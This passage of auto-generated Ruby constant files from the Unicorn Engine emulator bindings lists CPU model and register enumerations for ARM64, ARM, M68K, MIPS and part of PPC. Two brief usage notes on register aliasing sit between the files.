UC_ARM64_REG_X0 = 199; UC_ARM64_REG_X1 = 200; UC_ARM64_REG_X2 = 201; UC_ARM64_REG_X3 = 202; UC_ARM64_REG_X4 = 203; UC_ARM64_REG_X5 = 204; UC_ARM64_REG_X6 = 205; UC_ARM64_REG_X7 = 206
UC_ARM64_REG_X8 = 207; UC_ARM64_REG_X9 = 208; UC_ARM64_REG_X10 = 209; UC_ARM64_REG_X11 = 210; UC_ARM64_REG_X12 = 211; UC_ARM64_REG_X13 = 212; UC_ARM64_REG_X14 = 213; UC_ARM64_REG_X15 = 214
UC_ARM64_REG_X16 = 215; UC_ARM64_REG_X17 = 216; UC_ARM64_REG_X18 = 217; UC_ARM64_REG_X19 = 218; UC_ARM64_REG_X20 = 219; UC_ARM64_REG_X21 = 220; UC_ARM64_REG_X22 = 221; UC_ARM64_REG_X23 = 222
UC_ARM64_REG_X24 = 223; UC_ARM64_REG_X25 = 224; UC_ARM64_REG_X26 = 225; UC_ARM64_REG_X27 = 226; UC_ARM64_REG_X28 = 227
UC_ARM64_REG_V0 = 228; UC_ARM64_REG_V1 = 229; UC_ARM64_REG_V2 = 230; UC_ARM64_REG_V3 = 231; UC_ARM64_REG_V4 = 232; UC_ARM64_REG_V5 = 233; UC_ARM64_REG_V6 = 234; UC_ARM64_REG_V7 = 235
UC_ARM64_REG_V8 = 236; UC_ARM64_REG_V9 = 237; UC_ARM64_REG_V10 = 238; UC_ARM64_REG_V11 = 239; UC_ARM64_REG_V12 = 240; UC_ARM64_REG_V13 = 241; UC_ARM64_REG_V14 = 242; UC_ARM64_REG_V15 = 243
UC_ARM64_REG_V16 = 244; UC_ARM64_REG_V17 = 245; UC_ARM64_REG_V18 = 246; UC_ARM64_REG_V19 = 247; UC_ARM64_REG_V20 = 248; UC_ARM64_REG_V21 = 249; UC_ARM64_REG_V22 = 250; UC_ARM64_REG_V23 = 251
UC_ARM64_REG_V24 = 252; UC_ARM64_REG_V25 = 253; UC_ARM64_REG_V26 = 254; UC_ARM64_REG_V27 = 255; UC_ARM64_REG_V28 = 256; UC_ARM64_REG_V29 = 257; UC_ARM64_REG_V30 = 258; UC_ARM64_REG_V31 = 259

# pseudo registers
UC_ARM64_REG_PC = 260; UC_ARM64_REG_CPACR_EL1 = 261

# thread registers, deprecated, use UC_ARM64_REG_CP_REG instead
UC_ARM64_REG_TPIDR_EL0 = 262; UC_ARM64_REG_TPIDRRO_EL0 = 263; UC_ARM64_REG_TPIDR_EL1 = 264; UC_ARM64_REG_PSTATE = 265

# exception link registers, deprecated, use UC_ARM64_REG_CP_REG instead
UC_ARM64_REG_ELR_EL0 = 266; UC_ARM64_REG_ELR_EL1 = 267; UC_ARM64_REG_ELR_EL2 = 268; UC_ARM64_REG_ELR_EL3 = 269

# stack pointers registers, deprecated, use UC_ARM64_REG_CP_REG instead
UC_ARM64_REG_SP_EL0 = 270; UC_ARM64_REG_SP_EL1 = 271; UC_ARM64_REG_SP_EL2 = 272; UC_ARM64_REG_SP_EL3 = 273

# other CP15 registers, deprecated, use UC_ARM64_REG_CP_REG instead
UC_ARM64_REG_TTBR0_EL1 = 274; UC_ARM64_REG_TTBR1_EL1 = 275; UC_ARM64_REG_ESR_EL0 = 276; UC_ARM64_REG_ESR_EL1 = 277; UC_ARM64_REG_ESR_EL2 = 278; UC_ARM64_REG_ESR_EL3 = 279
UC_ARM64_REG_FAR_EL0 = 280; UC_ARM64_REG_FAR_EL1 = 281; UC_ARM64_REG_FAR_EL2 = 282; UC_ARM64_REG_FAR_EL3 = 283; UC_ARM64_REG_PAR_EL1 = 284; UC_ARM64_REG_MAIR_EL1 = 285
UC_ARM64_REG_VBAR_EL0 = 286; UC_ARM64_REG_VBAR_EL1 = 287; UC_ARM64_REG_VBAR_EL2 = 288
UC_ARM64_REG_VBAR_EL3 = 289; UC_ARM64_REG_CP_REG = 290

# floating point control and status registers
UC_ARM64_REG_FPCR = 291; UC_ARM64_REG_FPSR = 292; UC_ARM64_REG_ENDING = 293

# alias registers
UC_ARM64_REG_IP0 = 215; UC_ARM64_REG_IP1 = 216; UC_ARM64_REG_FP = 1; UC_ARM64_REG_LR = 2

# ARM64 instructions
UC_ARM64_INS_INVALID = 0; UC_ARM64_INS_MRS = 1; UC_ARM64_INS_MSR = 2; UC_ARM64_INS_SYS = 3; UC_ARM64_INS_SYSL = 4; UC_ARM64_INS_ENDING = 5
end
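One consequence of the V-to-Q remapping in unicorn.c above: 128-bit ARM64 vector registers cross the binding as two 64-bit halves (a sketch; UC_ARCH_ARM64 and UC_MODE_ARM are assumed to come from the generated unicorn_const file):

    uc = Uc.new(UC_ARCH_ARM64, UC_MODE_ARM)
    uc.reg_write(UC_ARM64_REG_V0, [0x1122334455667788, 0x99aabbccddeeff00])
    lo, hi = uc.reg_read(UC_ARM64_REG_Q0)   # V0 and Q0 name the same register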
==> unicorn-2.1.1/bindings/ruby/unicorn_gem/lib/unicorn_engine/arm_const.rb <==
# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [arm_const.rb]

module UnicornEngine

# ARM CPU
UC_CPU_ARM_926 = 0; UC_CPU_ARM_946 = 1; UC_CPU_ARM_1026 = 2; UC_CPU_ARM_1136_R2 = 3; UC_CPU_ARM_1136 = 4; UC_CPU_ARM_1176 = 5
UC_CPU_ARM_11MPCORE = 6; UC_CPU_ARM_CORTEX_M0 = 7; UC_CPU_ARM_CORTEX_M3 = 8; UC_CPU_ARM_CORTEX_M4 = 9; UC_CPU_ARM_CORTEX_M7 = 10; UC_CPU_ARM_CORTEX_M33 = 11
UC_CPU_ARM_CORTEX_R5 = 12; UC_CPU_ARM_CORTEX_R5F = 13; UC_CPU_ARM_CORTEX_A7 = 14; UC_CPU_ARM_CORTEX_A8 = 15; UC_CPU_ARM_CORTEX_A9 = 16; UC_CPU_ARM_CORTEX_A15 = 17
UC_CPU_ARM_TI925T = 18; UC_CPU_ARM_SA1100 = 19; UC_CPU_ARM_SA1110 = 20; UC_CPU_ARM_PXA250 = 21; UC_CPU_ARM_PXA255 = 22; UC_CPU_ARM_PXA260 = 23
UC_CPU_ARM_PXA261 = 24; UC_CPU_ARM_PXA262 = 25; UC_CPU_ARM_PXA270 = 26; UC_CPU_ARM_PXA270A0 = 27; UC_CPU_ARM_PXA270A1 = 28; UC_CPU_ARM_PXA270B0 = 29
UC_CPU_ARM_PXA270B1 = 30; UC_CPU_ARM_PXA270C0 = 31; UC_CPU_ARM_PXA270C5 = 32; UC_CPU_ARM_MAX = 33; UC_CPU_ARM_ENDING = 34

# ARM registers
UC_ARM_REG_INVALID = 0; UC_ARM_REG_APSR = 1; UC_ARM_REG_APSR_NZCV = 2; UC_ARM_REG_CPSR = 3; UC_ARM_REG_FPEXC = 4; UC_ARM_REG_FPINST = 5; UC_ARM_REG_FPSCR = 6; UC_ARM_REG_FPSCR_NZCV = 7
UC_ARM_REG_FPSID = 8; UC_ARM_REG_ITSTATE = 9; UC_ARM_REG_LR = 10; UC_ARM_REG_PC = 11; UC_ARM_REG_SP = 12; UC_ARM_REG_SPSR = 13
UC_ARM_REG_D0 = 14; UC_ARM_REG_D1 = 15; UC_ARM_REG_D2 = 16; UC_ARM_REG_D3 = 17; UC_ARM_REG_D4 = 18; UC_ARM_REG_D5 = 19; UC_ARM_REG_D6 = 20; UC_ARM_REG_D7 = 21
UC_ARM_REG_D8 = 22; UC_ARM_REG_D9 = 23; UC_ARM_REG_D10 = 24; UC_ARM_REG_D11 = 25; UC_ARM_REG_D12 = 26; UC_ARM_REG_D13 = 27; UC_ARM_REG_D14 = 28; UC_ARM_REG_D15 = 29
UC_ARM_REG_D16 = 30; UC_ARM_REG_D17 = 31; UC_ARM_REG_D18 = 32; UC_ARM_REG_D19 = 33; UC_ARM_REG_D20 = 34; UC_ARM_REG_D21 = 35; UC_ARM_REG_D22 = 36; UC_ARM_REG_D23 = 37
UC_ARM_REG_D24 = 38; UC_ARM_REG_D25 = 39; UC_ARM_REG_D26 = 40; UC_ARM_REG_D27 = 41; UC_ARM_REG_D28 = 42; UC_ARM_REG_D29 = 43; UC_ARM_REG_D30 = 44; UC_ARM_REG_D31 = 45
UC_ARM_REG_FPINST2 = 46; UC_ARM_REG_MVFR0 = 47; UC_ARM_REG_MVFR1 = 48; UC_ARM_REG_MVFR2 = 49
UC_ARM_REG_Q0 = 50; UC_ARM_REG_Q1 = 51; UC_ARM_REG_Q2 = 52; UC_ARM_REG_Q3 = 53; UC_ARM_REG_Q4 = 54; UC_ARM_REG_Q5 = 55; UC_ARM_REG_Q6 = 56; UC_ARM_REG_Q7 = 57
UC_ARM_REG_Q8 = 58; UC_ARM_REG_Q9 = 59; UC_ARM_REG_Q10 = 60; UC_ARM_REG_Q11 = 61; UC_ARM_REG_Q12 = 62; UC_ARM_REG_Q13 = 63; UC_ARM_REG_Q14 = 64; UC_ARM_REG_Q15 = 65
UC_ARM_REG_R0 = 66; UC_ARM_REG_R1 = 67; UC_ARM_REG_R2 = 68; UC_ARM_REG_R3 = 69; UC_ARM_REG_R4 = 70; UC_ARM_REG_R5 = 71; UC_ARM_REG_R6 = 72; UC_ARM_REG_R7 = 73
UC_ARM_REG_R8 = 74; UC_ARM_REG_R9 = 75; UC_ARM_REG_R10 = 76; UC_ARM_REG_R11 = 77; UC_ARM_REG_R12 = 78
UC_ARM_REG_S0 = 79; UC_ARM_REG_S1 = 80; UC_ARM_REG_S2 = 81; UC_ARM_REG_S3 = 82; UC_ARM_REG_S4 = 83; UC_ARM_REG_S5 = 84; UC_ARM_REG_S6 = 85; UC_ARM_REG_S7 = 86
UC_ARM_REG_S8 = 87; UC_ARM_REG_S9 = 88; UC_ARM_REG_S10 = 89; UC_ARM_REG_S11 = 90; UC_ARM_REG_S12 = 91; UC_ARM_REG_S13 = 92; UC_ARM_REG_S14 = 93; UC_ARM_REG_S15 = 94
UC_ARM_REG_S16 = 95; UC_ARM_REG_S17 = 96; UC_ARM_REG_S18 = 97; UC_ARM_REG_S19 = 98; UC_ARM_REG_S20 = 99; UC_ARM_REG_S21 = 100; UC_ARM_REG_S22 = 101; UC_ARM_REG_S23 = 102
UC_ARM_REG_S24 = 103; UC_ARM_REG_S25 = 104; UC_ARM_REG_S26 = 105; UC_ARM_REG_S27 = 106; UC_ARM_REG_S28 = 107; UC_ARM_REG_S29 = 108; UC_ARM_REG_S30 = 109; UC_ARM_REG_S31 = 110
UC_ARM_REG_C1_C0_2 = 111; UC_ARM_REG_C13_C0_2 = 112; UC_ARM_REG_C13_C0_3 = 113; UC_ARM_REG_IPSR = 114; UC_ARM_REG_MSP = 115; UC_ARM_REG_PSP = 116; UC_ARM_REG_CONTROL = 117
UC_ARM_REG_IAPSR = 118; UC_ARM_REG_EAPSR = 119; UC_ARM_REG_XPSR = 120; UC_ARM_REG_EPSR = 121; UC_ARM_REG_IEPSR = 122; UC_ARM_REG_PRIMASK = 123; UC_ARM_REG_BASEPRI = 124
UC_ARM_REG_BASEPRI_MAX = 125; UC_ARM_REG_FAULTMASK = 126; UC_ARM_REG_APSR_NZCVQ = 127; UC_ARM_REG_APSR_G = 128; UC_ARM_REG_APSR_NZCVQG = 129
UC_ARM_REG_IAPSR_NZCVQ = 130; UC_ARM_REG_IAPSR_G = 131; UC_ARM_REG_IAPSR_NZCVQG = 132; UC_ARM_REG_EAPSR_NZCVQ = 133; UC_ARM_REG_EAPSR_G = 134; UC_ARM_REG_EAPSR_NZCVQG = 135
UC_ARM_REG_XPSR_NZCVQ = 136; UC_ARM_REG_XPSR_G = 137; UC_ARM_REG_XPSR_NZCVQG = 138; UC_ARM_REG_CP_REG = 139; UC_ARM_REG_ENDING = 140

# alias registers
UC_ARM_REG_R13 = 12; UC_ARM_REG_R14 = 10; UC_ARM_REG_R15 = 11; UC_ARM_REG_SB = 75; UC_ARM_REG_SL = 76; UC_ARM_REG_FP = 77; UC_ARM_REG_IP = 78
end
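The alias blocks at the end of each table are plain value aliases, so two names with the same number address one underlying register (a sketch; UC_ARCH_ARM and UC_MODE_ARM are assumed to come from the generated unicorn_const file):

    uc = Uc.new(UC_ARCH_ARM, UC_MODE_ARM)
    uc.reg_write(UC_ARM_REG_SP, 0x2000)
    uc.reg_read(UC_ARM_REG_R13)   # => 0x2000; R13 and SP are both value 12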
==> unicorn-2.1.1/bindings/ruby/unicorn_gem/lib/unicorn_engine/m68k_const.rb <==
# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [m68k_const.rb]

module UnicornEngine

# M68K CPU
UC_CPU_M68K_M5206 = 0; UC_CPU_M68K_M68000 = 1; UC_CPU_M68K_M68020 = 2; UC_CPU_M68K_M68030 = 3; UC_CPU_M68K_M68040 = 4
UC_CPU_M68K_M68060 = 5; UC_CPU_M68K_M5208 = 6; UC_CPU_M68K_CFV4E = 7; UC_CPU_M68K_ANY = 8; UC_CPU_M68K_ENDING = 9

# M68K registers
UC_M68K_REG_INVALID = 0
UC_M68K_REG_A0 = 1; UC_M68K_REG_A1 = 2; UC_M68K_REG_A2 = 3; UC_M68K_REG_A3 = 4; UC_M68K_REG_A4 = 5; UC_M68K_REG_A5 = 6; UC_M68K_REG_A6 = 7; UC_M68K_REG_A7 = 8
UC_M68K_REG_D0 = 9; UC_M68K_REG_D1 = 10; UC_M68K_REG_D2 = 11; UC_M68K_REG_D3 = 12; UC_M68K_REG_D4 = 13; UC_M68K_REG_D5 = 14; UC_M68K_REG_D6 = 15; UC_M68K_REG_D7 = 16
UC_M68K_REG_SR = 17; UC_M68K_REG_PC = 18; UC_M68K_REG_ENDING = 19
end

==> unicorn-2.1.1/bindings/ruby/unicorn_gem/lib/unicorn_engine/mips_const.rb <==
# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [mips_const.rb]

module UnicornEngine

# MIPS32 CPUS
UC_CPU_MIPS32_4KC = 0; UC_CPU_MIPS32_4KM = 1; UC_CPU_MIPS32_4KECR1 = 2; UC_CPU_MIPS32_4KEMR1 = 3; UC_CPU_MIPS32_4KEC = 4; UC_CPU_MIPS32_4KEM = 5
UC_CPU_MIPS32_24KC = 6; UC_CPU_MIPS32_24KEC = 7; UC_CPU_MIPS32_24KF = 8; UC_CPU_MIPS32_34KF = 9; UC_CPU_MIPS32_74KF = 10; UC_CPU_MIPS32_M14K = 11
UC_CPU_MIPS32_M14KC = 12; UC_CPU_MIPS32_P5600 = 13; UC_CPU_MIPS32_MIPS32R6_GENERIC = 14; UC_CPU_MIPS32_I7200 = 15; UC_CPU_MIPS32_ENDING = 16

# MIPS64 CPUS
UC_CPU_MIPS64_R4000 = 0; UC_CPU_MIPS64_VR5432 = 1; UC_CPU_MIPS64_5KC = 2; UC_CPU_MIPS64_5KF = 3; UC_CPU_MIPS64_20KC = 4; UC_CPU_MIPS64_MIPS64R2_GENERIC = 5
UC_CPU_MIPS64_5KEC = 6; UC_CPU_MIPS64_5KEF = 7; UC_CPU_MIPS64_I6400 = 8; UC_CPU_MIPS64_I6500 = 9; UC_CPU_MIPS64_LOONGSON_2E = 10; UC_CPU_MIPS64_LOONGSON_2F = 11
UC_CPU_MIPS64_MIPS64DSPR2 = 12; UC_CPU_MIPS64_ENDING = 13

# MIPS registers
UC_MIPS_REG_INVALID = 0

# General purpose registers
UC_MIPS_REG_PC = 1
UC_MIPS_REG_0 = 2; UC_MIPS_REG_1 = 3; UC_MIPS_REG_2 = 4; UC_MIPS_REG_3 = 5; UC_MIPS_REG_4 = 6; UC_MIPS_REG_5 = 7; UC_MIPS_REG_6 = 8; UC_MIPS_REG_7 = 9
UC_MIPS_REG_8 = 10; UC_MIPS_REG_9 = 11; UC_MIPS_REG_10 = 12; UC_MIPS_REG_11 = 13; UC_MIPS_REG_12 = 14; UC_MIPS_REG_13 = 15; UC_MIPS_REG_14 = 16; UC_MIPS_REG_15 = 17
UC_MIPS_REG_16 = 18; UC_MIPS_REG_17 = 19; UC_MIPS_REG_18 = 20; UC_MIPS_REG_19 = 21; UC_MIPS_REG_20 = 22; UC_MIPS_REG_21 = 23; UC_MIPS_REG_22 = 24; UC_MIPS_REG_23 = 25
UC_MIPS_REG_24 = 26; UC_MIPS_REG_25 = 27; UC_MIPS_REG_26 = 28; UC_MIPS_REG_27 = 29; UC_MIPS_REG_28 = 30; UC_MIPS_REG_29 = 31; UC_MIPS_REG_30 = 32; UC_MIPS_REG_31 = 33

# DSP registers
UC_MIPS_REG_DSPCCOND = 34; UC_MIPS_REG_DSPCARRY = 35; UC_MIPS_REG_DSPEFI = 36; UC_MIPS_REG_DSPOUTFLAG = 37; UC_MIPS_REG_DSPOUTFLAG16_19 = 38; UC_MIPS_REG_DSPOUTFLAG20 = 39
UC_MIPS_REG_DSPOUTFLAG21 = 40; UC_MIPS_REG_DSPOUTFLAG22 = 41; UC_MIPS_REG_DSPOUTFLAG23 = 42; UC_MIPS_REG_DSPPOS = 43; UC_MIPS_REG_DSPSCOUNT = 44

# ACC registers
UC_MIPS_REG_AC0 = 45; UC_MIPS_REG_AC1 = 46; UC_MIPS_REG_AC2 = 47; UC_MIPS_REG_AC3 = 48
# COP registers
UC_MIPS_REG_CC0 = 49; UC_MIPS_REG_CC1 = 50; UC_MIPS_REG_CC2 = 51; UC_MIPS_REG_CC3 = 52; UC_MIPS_REG_CC4 = 53; UC_MIPS_REG_CC5 = 54; UC_MIPS_REG_CC6 = 55; UC_MIPS_REG_CC7 = 56

# FPU registers
UC_MIPS_REG_F0 = 57; UC_MIPS_REG_F1 = 58; UC_MIPS_REG_F2 = 59; UC_MIPS_REG_F3 = 60; UC_MIPS_REG_F4 = 61; UC_MIPS_REG_F5 = 62; UC_MIPS_REG_F6 = 63; UC_MIPS_REG_F7 = 64
UC_MIPS_REG_F8 = 65; UC_MIPS_REG_F9 = 66; UC_MIPS_REG_F10 = 67; UC_MIPS_REG_F11 = 68; UC_MIPS_REG_F12 = 69; UC_MIPS_REG_F13 = 70; UC_MIPS_REG_F14 = 71; UC_MIPS_REG_F15 = 72
UC_MIPS_REG_F16 = 73; UC_MIPS_REG_F17 = 74; UC_MIPS_REG_F18 = 75; UC_MIPS_REG_F19 = 76; UC_MIPS_REG_F20 = 77; UC_MIPS_REG_F21 = 78; UC_MIPS_REG_F22 = 79; UC_MIPS_REG_F23 = 80
UC_MIPS_REG_F24 = 81; UC_MIPS_REG_F25 = 82; UC_MIPS_REG_F26 = 83; UC_MIPS_REG_F27 = 84; UC_MIPS_REG_F28 = 85; UC_MIPS_REG_F29 = 86; UC_MIPS_REG_F30 = 87; UC_MIPS_REG_F31 = 88
UC_MIPS_REG_FCC0 = 89; UC_MIPS_REG_FCC1 = 90; UC_MIPS_REG_FCC2 = 91; UC_MIPS_REG_FCC3 = 92; UC_MIPS_REG_FCC4 = 93; UC_MIPS_REG_FCC5 = 94; UC_MIPS_REG_FCC6 = 95; UC_MIPS_REG_FCC7 = 96

# AFPR128
UC_MIPS_REG_W0 = 97; UC_MIPS_REG_W1 = 98; UC_MIPS_REG_W2 = 99; UC_MIPS_REG_W3 = 100; UC_MIPS_REG_W4 = 101; UC_MIPS_REG_W5 = 102; UC_MIPS_REG_W6 = 103; UC_MIPS_REG_W7 = 104
UC_MIPS_REG_W8 = 105; UC_MIPS_REG_W9 = 106; UC_MIPS_REG_W10 = 107; UC_MIPS_REG_W11 = 108; UC_MIPS_REG_W12 = 109; UC_MIPS_REG_W13 = 110; UC_MIPS_REG_W14 = 111; UC_MIPS_REG_W15 = 112
UC_MIPS_REG_W16 = 113; UC_MIPS_REG_W17 = 114; UC_MIPS_REG_W18 = 115; UC_MIPS_REG_W19 = 116; UC_MIPS_REG_W20 = 117; UC_MIPS_REG_W21 = 118; UC_MIPS_REG_W22 = 119; UC_MIPS_REG_W23 = 120
UC_MIPS_REG_W24 = 121; UC_MIPS_REG_W25 = 122; UC_MIPS_REG_W26 = 123; UC_MIPS_REG_W27 = 124; UC_MIPS_REG_W28 = 125; UC_MIPS_REG_W29 = 126; UC_MIPS_REG_W30 = 127; UC_MIPS_REG_W31 = 128
UC_MIPS_REG_HI = 129; UC_MIPS_REG_LO = 130; UC_MIPS_REG_P0 = 131; UC_MIPS_REG_P1 = 132; UC_MIPS_REG_P2 = 133; UC_MIPS_REG_MPL0 = 134; UC_MIPS_REG_MPL1 = 135; UC_MIPS_REG_MPL2 = 136
UC_MIPS_REG_CP0_CONFIG3 = 137; UC_MIPS_REG_CP0_USERLOCAL = 138; UC_MIPS_REG_CP0_STATUS = 139; UC_MIPS_REG_ENDING = 140
UC_MIPS_REG_ZERO = 2; UC_MIPS_REG_AT = 3; UC_MIPS_REG_V0 = 4; UC_MIPS_REG_V1 = 5; UC_MIPS_REG_A0 = 6; UC_MIPS_REG_A1 = 7; UC_MIPS_REG_A2 = 8; UC_MIPS_REG_A3 = 9
UC_MIPS_REG_T0 = 10; UC_MIPS_REG_T1 = 11; UC_MIPS_REG_T2 = 12; UC_MIPS_REG_T3 = 13; UC_MIPS_REG_T4 = 14; UC_MIPS_REG_T5 = 15; UC_MIPS_REG_T6 = 16; UC_MIPS_REG_T7 = 17
UC_MIPS_REG_S0 = 18; UC_MIPS_REG_S1 = 19; UC_MIPS_REG_S2 = 20; UC_MIPS_REG_S3 = 21; UC_MIPS_REG_S4 = 22; UC_MIPS_REG_S5 = 23; UC_MIPS_REG_S6 = 24; UC_MIPS_REG_S7 = 25
UC_MIPS_REG_T8 = 26; UC_MIPS_REG_T9 = 27; UC_MIPS_REG_K0 = 28; UC_MIPS_REG_K1 = 29; UC_MIPS_REG_GP = 30; UC_MIPS_REG_SP = 31; UC_MIPS_REG_FP = 32; UC_MIPS_REG_S8 = 32
UC_MIPS_REG_RA = 33; UC_MIPS_REG_HI0 = 45; UC_MIPS_REG_HI1 = 46; UC_MIPS_REG_HI2 = 47; UC_MIPS_REG_HI3 = 48; UC_MIPS_REG_LO0 = 45; UC_MIPS_REG_LO1 = 46; UC_MIPS_REG_LO2 = 47; UC_MIPS_REG_LO3 = 48
end

==> unicorn-2.1.1/bindings/ruby/unicorn_gem/lib/unicorn_engine/ppc_const.rb <==
# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [ppc_const.rb]

module UnicornEngine

# PPC CPU
UC_CPU_PPC32_401 = 0; UC_CPU_PPC32_401A1 = 1; UC_CPU_PPC32_401B2 = 2; UC_CPU_PPC32_401C2 = 3; UC_CPU_PPC32_401D2 = 4; UC_CPU_PPC32_401E2 = 5
UC_CPU_PPC32_401F2 = 6; UC_CPU_PPC32_401G2 = 7; UC_CPU_PPC32_IOP480 = 8; UC_CPU_PPC32_COBRA = 9; UC_CPU_PPC32_403GA = 10; UC_CPU_PPC32_403GB = 11
UC_CPU_PPC32_403GC = 12; UC_CPU_PPC32_403GCX = 13; UC_CPU_PPC32_405D2 = 14; UC_CPU_PPC32_405D4 = 15; UC_CPU_PPC32_405CRA = 16; UC_CPU_PPC32_405CRB = 17
UC_CPU_PPC32_405CRC = 18; UC_CPU_PPC32_405EP = 19; UC_CPU_PPC32_405EZ = 20; UC_CPU_PPC32_405GPA = 21; UC_CPU_PPC32_405GPB = 22; UC_CPU_PPC32_405GPC = 23
UC_CPU_PPC32_405GPD = 24; UC_CPU_PPC32_405GPR = 25; UC_CPU_PPC32_405LP = 26; UC_CPU_PPC32_NPE405H = 27; UC_CPU_PPC32_NPE405H2 = 28; UC_CPU_PPC32_NPE405L = 29
UC_CPU_PPC32_NPE4GS3 = 30; UC_CPU_PPC32_STB03 = 31; UC_CPU_PPC32_STB04 = 32; UC_CPU_PPC32_STB25 = 33; UC_CPU_PPC32_X2VP4 = 34; UC_CPU_PPC32_X2VP20 = 35
UC_CPU_PPC32_440_XILINX = 36; UC_CPU_PPC32_440_XILINX_W_DFPU = 37; UC_CPU_PPC32_440EPA = 38; UC_CPU_PPC32_440EPB = 39; UC_CPU_PPC32_440EPX = 40; UC_CPU_PPC32_460EXB = 41
UC_CPU_PPC32_G2 = 42; UC_CPU_PPC32_G2H4 = 43; UC_CPU_PPC32_G2GP = 44; UC_CPU_PPC32_G2LS = 45; UC_CPU_PPC32_G2HIP3 = 46; UC_CPU_PPC32_G2HIP4 = 47
UC_CPU_PPC32_MPC603 = 48; UC_CPU_PPC32_G2LE = 49; UC_CPU_PPC32_G2LEGP = 50; UC_CPU_PPC32_G2LELS = 51; UC_CPU_PPC32_G2LEGP1 = 52; UC_CPU_PPC32_G2LEGP3 = 53
UC_CPU_PPC32_MPC5200_V10 = 54; UC_CPU_PPC32_MPC5200_V11 = 55; UC_CPU_PPC32_MPC5200_V12 = 56; UC_CPU_PPC32_MPC5200B_V20 = 57; UC_CPU_PPC32_MPC5200B_V21 = 58; UC_CPU_PPC32_E200Z5 = 59
UC_CPU_PPC32_E200Z6 = 60; UC_CPU_PPC32_E300C1 = 61; UC_CPU_PPC32_E300C2 = 62; UC_CPU_PPC32_E300C3 = 63; UC_CPU_PPC32_E300C4 = 64; UC_CPU_PPC32_MPC8343 = 65
UC_CPU_PPC32_MPC8343A = 66; UC_CPU_PPC32_MPC8343E = 67; UC_CPU_PPC32_MPC8343EA = 68; UC_CPU_PPC32_MPC8347T = 69; UC_CPU_PPC32_MPC8347P = 70; UC_CPU_PPC32_MPC8347AT = 71
UC_CPU_PPC32_MPC8347AP = 72; UC_CPU_PPC32_MPC8347ET = 73; UC_CPU_PPC32_MPC8347EP = 74; UC_CPU_PPC32_MPC8347EAT = 75; UC_CPU_PPC32_MPC8347EAP = 76; UC_CPU_PPC32_MPC8349 = 77
UC_CPU_PPC32_MPC8349A = 78; UC_CPU_PPC32_MPC8349E = 79; UC_CPU_PPC32_MPC8349EA = 80; UC_CPU_PPC32_MPC8377 = 81; UC_CPU_PPC32_MPC8377E = 82; UC_CPU_PPC32_MPC8378 = 83
UC_CPU_PPC32_MPC8378E = 84; UC_CPU_PPC32_MPC8379 = 85; UC_CPU_PPC32_MPC8379E = 86; UC_CPU_PPC32_E500_V10 = 87; UC_CPU_PPC32_E500_V20 = 88; UC_CPU_PPC32_E500V2_V10 = 89
UC_CPU_PPC32_E500V2_V20 = 90; UC_CPU_PPC32_E500V2_V21 = 91; UC_CPU_PPC32_E500V2_V22 = 92; UC_CPU_PPC32_E500V2_V30 = 93; UC_CPU_PPC32_E500MC = 94; UC_CPU_PPC32_MPC8533_V10 = 95
UC_CPU_PPC32_MPC8533_V11 = 96; UC_CPU_PPC32_MPC8533E_V10 = 97; UC_CPU_PPC32_MPC8533E_V11 = 98; UC_CPU_PPC32_MPC8540_V10 = 99; UC_CPU_PPC32_MPC8540_V20 = 100; UC_CPU_PPC32_MPC8540_V21 = 101
UC_CPU_PPC32_MPC8541_V10 = 102; UC_CPU_PPC32_MPC8541_V11 = 103; UC_CPU_PPC32_MPC8541E_V10 = 104; UC_CPU_PPC32_MPC8541E_V11 = 105; UC_CPU_PPC32_MPC8543_V10 = 106; UC_CPU_PPC32_MPC8543_V11 = 107
UC_CPU_PPC32_MPC8543_V20 = 108; UC_CPU_PPC32_MPC8543_V21 = 109; UC_CPU_PPC32_MPC8543E_V10 = 110; UC_CPU_PPC32_MPC8543E_V11 = 111; UC_CPU_PPC32_MPC8543E_V20 = 112; UC_CPU_PPC32_MPC8543E_V21 = 113
UC_CPU_PPC32_MPC8544_V10 = 114; UC_CPU_PPC32_MPC8544_V11 = 115; UC_CPU_PPC32_MPC8544E_V10 = 116; UC_CPU_PPC32_MPC8544E_V11 = 117; UC_CPU_PPC32_MPC8545_V20 = 118; UC_CPU_PPC32_MPC8545_V21 = 119
UC_CPU_PPC32_MPC8545E_V20 = 120; UC_CPU_PPC32_MPC8545E_V21 = 121; UC_CPU_PPC32_MPC8547E_V20 = 122; UC_CPU_PPC32_MPC8547E_V21 = 123; UC_CPU_PPC32_MPC8548_V10 = 124; UC_CPU_PPC32_MPC8548_V11 = 125
UC_CPU_PPC32_MPC8548_V20 = 126
UC_CPU_PPC32_MPC8548_V21 = 127; UC_CPU_PPC32_MPC8548E_V10 = 128; UC_CPU_PPC32_MPC8548E_V11 = 129; UC_CPU_PPC32_MPC8548E_V20 = 130; UC_CPU_PPC32_MPC8548E_V21 = 131; UC_CPU_PPC32_MPC8555_V10 = 132
UC_CPU_PPC32_MPC8555_V11 = 133; UC_CPU_PPC32_MPC8555E_V10 = 134; UC_CPU_PPC32_MPC8555E_V11 = 135; UC_CPU_PPC32_MPC8560_V10 = 136; UC_CPU_PPC32_MPC8560_V20 = 137; UC_CPU_PPC32_MPC8560_V21 = 138
UC_CPU_PPC32_MPC8567 = 139; UC_CPU_PPC32_MPC8567E = 140; UC_CPU_PPC32_MPC8568 = 141; UC_CPU_PPC32_MPC8568E = 142; UC_CPU_PPC32_MPC8572 = 143; UC_CPU_PPC32_MPC8572E = 144
UC_CPU_PPC32_E600 = 145; UC_CPU_PPC32_MPC8610 = 146; UC_CPU_PPC32_MPC8641 = 147; UC_CPU_PPC32_MPC8641D = 148; UC_CPU_PPC32_601_V0 = 149; UC_CPU_PPC32_601_V1 = 150
UC_CPU_PPC32_601_V2 = 151; UC_CPU_PPC32_602 = 152; UC_CPU_PPC32_603 = 153; UC_CPU_PPC32_603E_V1_1 = 154; UC_CPU_PPC32_603E_V1_2 = 155; UC_CPU_PPC32_603E_V1_3 = 156
UC_CPU_PPC32_603E_V1_4 = 157; UC_CPU_PPC32_603E_V2_2 = 158; UC_CPU_PPC32_603E_V3 = 159; UC_CPU_PPC32_603E_V4 = 160; UC_CPU_PPC32_603E_V4_1 = 161; UC_CPU_PPC32_603E7 = 162
